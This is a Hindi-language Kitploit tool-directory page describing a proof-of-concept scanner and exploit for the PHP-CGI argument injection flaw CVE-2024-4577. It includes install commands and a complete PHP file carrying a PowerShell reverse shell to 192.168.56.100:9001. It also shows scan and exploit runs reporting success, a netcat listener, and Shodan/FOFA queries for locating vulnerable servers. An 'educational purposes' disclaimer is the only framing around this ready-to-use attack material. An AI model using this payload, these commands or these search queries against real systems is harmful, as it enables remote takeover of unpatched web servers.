Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4577-RCE — PoC - PHP CGI आर्गुमेंट इंजेक्शन CVE-2024-4577 (स्कैनर और एक्सप्लॉइट) | Kitploit
उपकरण/GitHubGitHub/l0n3m4n/cve-2024-4577-rce
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubl0n3m4n/cve-2024-4577-rce

CVE-2024-4577-RCE

PoC - PHP CGI आर्गुमेंट इंजेक्शन CVE-2024-4577 (स्कैनर और एक्सप्लॉइट)

रिपॉजिटरी देखें
7162 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PHP CGI आर्गुमेंट इंजेक्शन (CVE-2024-4577) RCE

Facebook X Medium Python Kali

📜 विवरण

PHP संस्करण 8.1.* (8.1.29 से पहले), 8.2.* (8.2.20 से पहले), 8.3.* (8.3.8 से पहले) में, विंडोज पर Apache और PHP-CGI का उपयोग करते समय, यदि सिस्टम को कुछ कोड पेजों का उपयोग करने के लिए सेट किया गया है, तो विंडोज Win32 API फंक्शन्स को दिए गए कमांड लाइन में अक्षरों को बदलने के लिए "Best-Fit" व्यवहार का उपयोग कर सकता है। PHP CGI मॉड्यूल उन अक्षरों को PHP विकल्पों के रूप में गलत समझ सकता है, जो एक दुर्भावनापूर्ण उपयोगकर्ता को चल रहे PHP बाइनरी में विकल्प पारित करने की अनुमति दे सकता है, और इस प्रकार स्क्रिप्ट का स्रोत कोड प्रकट कर सकता है, सर्वर पर मनमाना PHP कोड चला सकता है, आदि।

"XAMPP एक डिफ़ॉल्ट कॉन्फ़िगरेशन में कमजोर है, और हम /php-cgi/php-cgi.exe एंडपॉइंट को लक्षित कर सकते हैं। एक स्पष्ट .php एंडपॉइंट (जैसे /index.php) को लक्षित करने के लिए, सर्वर को PHP स्क्रिप्ट्स को CGI मोड में चलाने के लिए कॉन्फ़िगर किया जाना चाहिए।"

📚 विषय सूची

  • 📜 विवरण
  • 🛠️ स्थापना
  • ⚙️ उपयोग
  • 💁 संदर्भ

🛠️ स्थापना

$ git clone https://github.com/l0n3m4n/CVE-2024-4577-RCE.git
$ cd CVE-2024-4577-RCE && pip install -r requirements.txt 

⚙️ उपयोग

php-cge

🤖 रिवर्स शेल स्थापित करना

PHP पेलोड

[!NOTE] यह उपकरण वास्तविक हमले और तकनीकों (TTPs) को प्रदर्शित करता है। हालांकि, यह विशिष्ट पेलोड नमूना इस परिदृश्य में काम नहीं करता है। पूर्ण कार्यात्मक पेलोड प्राप्त करने के लिए shell.php को संशोधित करें।

# rev_shell.php
<?php
$payload = "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('192.168.56.100', 9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\";

exec($payload);
?>
 

🖥️ सर्वर स्कैन करना

$ python3 CVE-2024-4577.py -s -t https://target.com/  
                                                   
 _____ _____ _____ _____ _____ _____                 _____       _         _   
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_ 
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|  
                                                |___|         |___|            
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner                      
    
[+] Target https://target.com is vulnerable to CVE-2024-4577

🎯 कमजोर सर्वर का शोषण

$ python3 CVE-2024-4577.py -t http://example.com -e -p rev_shell.php
                                                   
 _____ _____ _____ _____ _____ _____                 _____       _         _   
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_ 
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|  
                                                |___|         |___|            
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner  

[+] Exploit successful!

👨🏻‍💻 Netcat लिसनर

$ nc -lvnp 9001

🔍 कमजोर होस्ट की खोज

  • Shodan: server: PHP 8.1, server: PHP 8.2, server: PHP 8.3
  • FOFA: protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"

💁 संदर्भ

  • https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
  • https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-4577.yaml
  • http://www.openwall.com/lists/oss-security/2024/06/07/1
  • https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
  • https://www.php.net/ChangeLog-8.php#8.1.29
  • https://www.php.net/ChangeLog-8.php#8.2.20
  • https://www.php.net/ChangeLog-8.php#8.3.8

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। निर्माता उपकरण के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है। समस्या बनाएं

टूल डाउनलोड करें